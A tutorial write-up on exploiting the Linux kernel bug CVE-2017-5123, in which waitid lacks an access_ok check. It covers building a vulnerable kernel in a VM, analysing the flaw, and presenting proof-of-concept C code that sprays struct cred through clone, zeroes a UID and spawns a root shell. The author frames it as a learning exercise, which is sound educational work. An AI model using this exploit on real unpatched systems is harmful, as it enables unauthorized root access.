Home

Awesome

CVE-2017-5123

PoC CVE-2017-5123 - LPE - Bypassing SMEP/SMAP. No KASLR

The waitid implementation in upstream kernels did not restrict the target destination to copy information results. This can allow local users to write to otherwise protected kernel memory, which can lead to privilege escalation.

Introduction

In this little writeup, I will analyze a kernel vulnerability that allow us to obtain root privilege.

This file is divided into four parts:

  1. VM setup;
  2. vulnerability analysis;
  3. exploitation;
  4. PoC.

I want to point out that there are a lot of better ways to exploit this CVE (indeed, this is just a PoC for learning the kernel, it can't be used in the wild) but I think that this methodology can be useful as an introduction to kernel exploitation.

VM Setup

Kernel Build

This vulnerability was introduced in 4c48abe91be0 so we need to build that version of the kernel.

This can be a little tricky because this is an old version and the code should be patched. I made a repository with an already patched kernel code and a .config file so you can clone and build.

git clone https://github.com/c3r34lk1ll3r/kernel_mirror.git
cd kernel_mirror
git checkout origin/modified_v4.14
wget https://gist.githubusercontent.com/c3r34lk1ll3r/c9c34ae86140cc7a24d0d90141686ee8/raw/52431b577a71e3fe8f89d6ce355ce9c1c54c53b6/.config
make -j 8 --output-sync=recurse

Note that this kernel will be built with virtio drivers so you can use virtio disk for sharing file from/to VM.

Rootfs Setup

Now, we will create the initial rootfs:

qemu-img create -f raw hda.raw 10G
# Format the disk to ext4
mkfs.ext4 ./hda.raw 
# Make a mountpoint for the image
mkdir /tmp/mount1
# Mount the disk
sudo mount -o loop ./hda.raw /tmp/mount1

Then, we should install a basic Linux distribution, for example using pacstrap or debootstrap.

sudo pacstrap /tmp/mount1 base base-devel vim

Finally, we can modify the system:

# Add a 'test' user
echo 'test:x:1000:1000::/home/test:/bin/bash' | sudo tee -a /tmp/mount1/etc/passwd
# without password
echo 'test::14871::::::' | sudo tee -a /tmp/mount1/etc/shadow 
# we can mount a virtio disk in order to share files between host and guest
echo '/transient /home/test/shared 9p trans=virtio,version=9p2000.L,rw,user,exec 0 0' | sudo tee -a /tmp/mount1/etc/fstab
sudo mkdir -p /tmp/mount1/home/test/shared 
# It is usefull to have sudo permission
echo '%wheel ALL=(ALL) NOPASSWD: ALL' | sudo tee -a /tmp/mount1/etc/sudoers
echo 'wheel:x:998:test' | sudo tee -a /tmp/mount1/etc/group

sudo chown -R 1000:1000 /tmp/mount1/home/test
sudo umount /tmp/mount1

If everything is in order, we can now try our testing system with qemu:

qemu-system-x86_64 \
    -kernel ./kernel_mirror/arch/x86_64/boot/bzImage \
    -hda ./hda.raw \
    -m 4G \
    -cpu "Skylake-Client-IBRS,ss=on,vmx=on,hypervisor=on,tsc-adjust=on,clflushopt=on,umip=on,md-clear=on,stibp=on,arch-capabilities=on,ssbd=on,xsaves=on,pdpe1gb=on,ibpb=on,amd-ssbd=on,skip-l1dfl-vmentry=on,hle=off,rtm=off" \
    -smp 4 \
    -vga virtio \
    -enable-kvm \
    -nographic \
    -machine type=q35,accel=kvm \
    -virtfs "fsdriver=local,id=fs.1,path=./trans_fs,security_model=mapped,writeout=immediate,mount_tag=/transient" \
    -append "root=/dev/sda rw noquiet nokaslr console=ttyS0 loglevel=5" \
    -chardev "vc,id=vc.0,cols=1920,rows=1080" \
    -net "user,hostfwd=tcp::10022-:22" \
    -net "nic" \
    -s

Vulnerability

The description of the CVE says that there is an unrestricted write operation during the waitid system call.

Let's open kernel/exit.c and look the code:

SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
		infop, int, options, struct rusage __user *, ru)
{
    struct rusage r;
    struct waitid_info info = {.status = 0};
    long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
    int signo = 0;

    if (err > 0) {
        signo = SIGCHLD;
        err = 0;
        if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
            return -EFAULT;
    }
    if (!infop)
        return err;
    user_access_begin();
    unsafe_put_user(signo, &infop->si_signo, Efault);
    unsafe_put_user(0, &infop->si_errno, Efault);
    unsafe_put_user(info.cause, &infop->si_code, Efault);
    unsafe_put_user(info.pid, &infop->si_pid, Efault);
    unsafe_put_user(info.uid, &infop->si_uid, Efault);
    unsafe_put_user(info.status, &infop->si_status, Efault);
    user_access_end();
    return err;
Efault:
    user_access_end();
    return -EFAULT;
}

This function is pretty straightforward: after few checks, there are various call to unsafe_put_user(...) and the function returns.

The main part of this function is composed by unsafe_put_user(...) function so let's move there (arch/x86/include/asm/uaccess.h):

/*
 * The "unsafe" user accesses aren't really "unsafe", but the naming
 * is a big fat warning: you have to not only do the access_ok()
 * checking before using them, but you have to surround them with the
 * user_access_begin/end() pair.
 */
#define user_access_begin()	__uaccess_begin()
#define user_access_end()	__uaccess_end()

#define unsafe_put_user(x, ptr, err_label)					\
do {										\
    int __pu_err;								\
    __typeof__(*(ptr)) __pu_val = (x);					\
    __put_user_size(__pu_val, (ptr), sizeof(*(ptr)), __pu_err, -EFAULT);	\
    if (unlikely(__pu_err)) goto err_label;					\
} while (0)

#define unsafe_get_user(x, ptr, err_label)					\
do {										\
    int __gu_err;								\  
    __inttype(*(ptr)) __gu_val;						\
    __get_user_size(__gu_val, (ptr), sizeof(*(ptr)), __gu_err, -EFAULT);	\
    (x) = (__force __typeof__(*(ptr)))__gu_val;				\
    if (unlikely(__gu_err)) goto err_label;					\
} while (0)

There is a big fat warning in the comment: if you want to use unsafe_put/get_user you should first call access_ok() and surround them with user_access_begin/end().

If we take a look at the previous code (waitid) we can see that access_ok() is never called so the system call violates this warning.

But what are those macros?

SMAP/SMEP

SMAP and SMEP are two security features introduced in the kernel in order to makes harder to write exploits. To be noted that those features are enforced by the CPU.

SMEP prevents to execute userspace code while the CPU is in supervisor mode; SMAP, instead, blocks read/write access to user memory.

The kernel needs to write/read data to/from user memory and this can be accomplished in two ways:

  1. there are functions (e.g. copy_from_user) that allows to copy the memory in kernel space;
  2. temporarily disable SMAP

As we can see in the definition of unsafe_put_user, this function will only copy the value of x in memory pointed by ptr (and jump to err_label if there was an error). We have just said that the kernel can't access to userspace because SMAP and this is why those functions should be wrapped between user_access_begin/end().

#define __uaccess_begin() stac()
#define __uaccess_end()   clac()

As we can see, user_access_begin/end simply are the ASM instruction stac and clac.

Basically, these two macros enable/disable SMAP.

Our previous "warning" mentions also access_ok function:

/**
 * access_ok: - Checks if a user space pointer is valid
 * @type: Type of access: %VERIFY_READ or %VERIFY_WRITE.  Note that
 *        %VERIFY_WRITE is a superset of %VERIFY_READ - if it is safe
 *        to write to a block, it is always safe to read from it.
 * @addr: User space pointer to start of block to check
 * @size: Size of block to check
 *
 * Context: User context only. This function may sleep if pagefaults are
 *          enabled.
 *
 * Checks if a pointer to a block of memory in user space is valid.
 *
 * Returns true (nonzero) if the memory block may be valid, false (zero)
 * if it is definitely invalid.
 *
 * Note that, depending on architecture, this function probably just
 * checks that the pointer is in the user space range - after calling
 * this function, memory access functions may still return -EFAULT.
 */
#define access_ok(type, addr, size)					\
({									\
	WARN_ON_IN_IRQ();						\
	likely(!__range_not_ok(addr, size, user_addr_max()));		\
})

The comment here is self explanatory: this macro checks if the pointer is a valid user space pointer.

Arbitrary write

Let's take another look on the waitid code:

	user_access_begin();
	unsafe_put_user(signo, &infop->si_signo, Efault);
	unsafe_put_user(0, &infop->si_errno, Efault);
	unsafe_put_user(info.cause, &infop->si_code, Efault);
	unsafe_put_user(info.pid, &infop->si_pid, Efault);
	unsafe_put_user(info.uid, &infop->si_uid, Efault);
	unsafe_put_user(info.status, &infop->si_status, Efault);
	user_access_end();

As you already guessed, the absence of access_ok() leads to an arbitrary write everywhere in memory because infop pointer is completly controlled by the attacker.

Trigger the bug

It's really easy to reach the vulnerable path and we can create a trigger with this simply code:

int thread_ready;
int die_thread(void *arg){
    thread_ready=1;
    syscall(__NR_sched_yield);
    return 0;
}
void *stack;
int trigger_bug(uint64_t where, int what){
  printf("[0] Trying to overwrite 0x%016lx\r", where);
  //int pid = fork(); // It is also possible to use fork syscall
  thread_ready = 0; 
  int pid = clone(die_thread, stack, CLONE_VM | CLONE_FS|CLONE_FILES|CLONE_SYSVSEM | SIGCHLD, NULL);
  int err;
  while(thread_ready == 0) {syscall(__NR_sched_yield);} // We should wait the thread
  err = syscall(__NR_waitid, P_PID, pid, where, WEXITED, NULL);   
  return err;
}

This simply code will trigger the vulnerability and write in the memory pointed by where address.

We can use gdb if we want to check this trigger. For example, we can select an arbitrary address and use the trigger_bug function to ovewrite it.

Exploitation

This vulnerbility can be exploited in various way but I prefer a very simple approch.

Remember that we can write everywhere we want but the data written are partially controllee. We can overwrite an address with 0.

The basic idea is to overwrite the UID of our process and become root but we first need to understand what are credentials in Linux.

Fork

We start with digging into fork system call. This function is used to create new processes.

We can check the code in kernel/fork.c:

SYSCALL_DEFINE0(fork)
{
	return _do_fork(SIGCHLD, 0, 0, NULL, NULL, 0);
}

So, fork system call is simply a wrapper for _do_fork with hardcoded parameters.

This last function is a bit long but we can summarize it in this way:

long _do_fork(unsigned long clone_flags,
	      unsigned long stack_start,
	      unsigned long stack_size,
	      int __user *parent_tidptr,
	      int __user *child_tidptr,
	      unsigned long tls)
{
	struct task_struct *p;
	int trace = 0;
	long nr;
  ......

  // This will create another task struct but it will NOT start the process. 
	p = copy_process(clone_flags, stack_start, stack_size,
			 child_tidptr, NULL, trace, tls, NUMA_NO_NODE);
	add_latent_entropy();
  ......
    // Wake up the new created task. This will set in RUNNING the state of the task and enqueue in the running queue code
		wake_up_new_task(p);
  ......
		put_pid(pid);
	} else {
		nr = PTR_ERR(p);
	}
	return nr;
}

This function will allocate a new task_struct object. Although this structure is really important (it describes a process), we will focus our attention to cred field:

...
	/* Process credentials: */
	/* Tracer's credentials at attach: */
	const struct cred __rcu		*ptracer_cred;

	/* Objective and real subjective task credentials (COW): */
	const struct cred __rcu		*real_cred;

	/* Effective (overridable) subjective task credentials (COW): */
	const struct cred __rcu		*cred;
  ...

As we can see, there is (three) pointer to struct cred. Let's see how this structure is composed (include/linux/cred.h):

struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
  ......

As we can see, the UID of a process is simply an unsigned integer (follow the definition of kuid_t) so we can simply overwrite this value with 0 in order to become root.

Copy_process

The task_struct structure is allocated in copy_process function which is a bit complex and his main goal is to "copy" the process in a new one.

We can focus on the copy_creds(p, clone_flags) that is defined as:

/*
 * Copy credentials for the new process created by fork()
 *
 * We share if we can, but under some circumstances we have to generate a new
 * set.
 *
 * The new process gets the current process's subjective credentials as its
 * objective and subjective credentials
 */
int copy_creds(struct task_struct *p, unsigned long clone_flags)
{
	struct cred *new;
	int ret;

	if (
#ifdef CONFIG_KEYS
		!p->cred->thread_keyring &&
#endif
		clone_flags & CLONE_THREAD
	    ) {
		p->real_cred = get_cred(p->cred);
		get_cred(p->cred);
		alter_cred_subscribers(p->cred, 2);
		kdebug("share_creds(%p{%d,%d})",
		       p->cred, atomic_read(&p->cred->usage),
		       read_cred_subscribers(p->cred));
		atomic_inc(&p->cred->user->processes);
		return 0;
	}

	new = prepare_creds();
	if (!new)
		return -ENOMEM;

	if (clone_flags & CLONE_NEWUSER) {
		ret = create_user_ns(new);
		if (ret < 0)
			goto error_put;
	}

.........

error_put:
	put_cred(new);
	return ret;
}

As we can see, this function calls prepare_creds where the real allocation is performed.

We have now a path to allocate an (pseudo)arbitrary number of struct cred:

  1. _do_fork()
  2. copy_process()
  3. copy_creds()

Our last problems is how to call _do_fork() from userspace. We can use fork but this can be slow so we will use clone instead.

Note: we can't use pthread because of the flags: if you look the code copy_creds you should notice that there is a path where the structure is not really allocated.

Put it all togheter

Now, a little recap:

  1. we are able to trigger the bug and write in the memory
  2. we know that we can write 0 in the memory
  3. we know that if we overwrite the UID of one process with 0, it obtains root permissions.

Now we need to know where write in memory and ,altought KASLR is disabled, the address of one struct cred is not enough stable so I decided to proced with memory spraying.

Spraying

We need to find the struct cred in memory in order to detect a range of addresses. We can use gdb and python with a script like this:

....
for task in task_lists():
    #gdb.write("{address} {pid} {comm}\n".format(
    #    address=task,
    #    pid=task["pid"],
    #    comm=task["comm"].string()))
    comm = task["comm"].string()
    # Insert your executable name
    if comm == "exploit":
        print(task['cred'])
....

Note: this script works only with KASLR disabled and with debug symbols (we neeed init_task pointer). We can try a few times and we can see that the heap grown down so we can try a lower and go high.

Now we can use clone system call to spawn a lot of processes and thanks to gdb we can check the addresses:

stack=malloc(STACK_SIZE)+STACK_SIZE;
  for(x=0;x<MAX_THREADS;x++){
    stackTop = malloc(STACK_SIZE) + STACK_SIZE;
    if (!stackTop){
      perror("[-] Malloc");
      return -1;
    }
    // spray_thread function can simply be a infinite loop
    pid = clone(spray_thread, stackTop, CLONE_VM | CLONE_FS|CLONE_FILES|CLONE_SYSVSEM | SIGCHLD, NULL);
    if (pid == -1){
      perror("\n\nCLONE");
      return -1;
    }
    printf("[0] Process created: %d\r", x);
    }

Note: Maybe you can't spawn more than 4k processes. Check ulimits if this is the case.

PoC

Finally, we can write our PoC.

It is sufficient to call trigger_bug with different address (searching the structure) meanwhile our spawned thread will check its UID, like this:

struct shared_area{
  int one_win;
};
struct shared_area glob_var;

// Sprayed thread
int spray_thread(void *arg){
  int uid;
  int previous_one = syscall(__NR_getuid);
  // Loop over syscall getUID
  while(1){
    uid = syscall(__NR_getuid);
    //printf("UID: %d\n",uid);
    // If returned UID is different from the previous one, then we have hitted a struct cred area
    if (uid != previous_one){
      printf("WIN!! with %d", uid);
      // Kill other treads in order to stabilize the system
      glob_var.one_win = 1;
      // Simply spawn a shell
      system("/bin/sh");
    }
    if(glob_var.one_win == 1)
      return 1;
  }
  return 0;
}

There is a probability of 50% to hit the structure so after a few runs you can obtain root privileage.

Root

Conclusion

This is a (basic) PoC and the spraying is far from perfect. This is just an "introduction" to the amazing world of kernel, there are a lot of concepts that I skipped but they are extremly importants (like memory managment). If you want to study deeper you can take a look at prepare_creds and the memory allocations.

KASLR is disabled but this vulnerability allows to bypass this mitigation as well (unsafe_put_user doesn't crash with invalid address) but I don't think that adding a new "layer" of bruteforcing is useful if your goal is to learn kernel. If your objective is to use this vulnerability in the wild you should write a different exploit (at least, different spraying).

Food for thought: I used this vulnerability to understand and try ret2dir techinque (Hint: you can trigger the write in the alias address and read the modification with userspace address).

Reference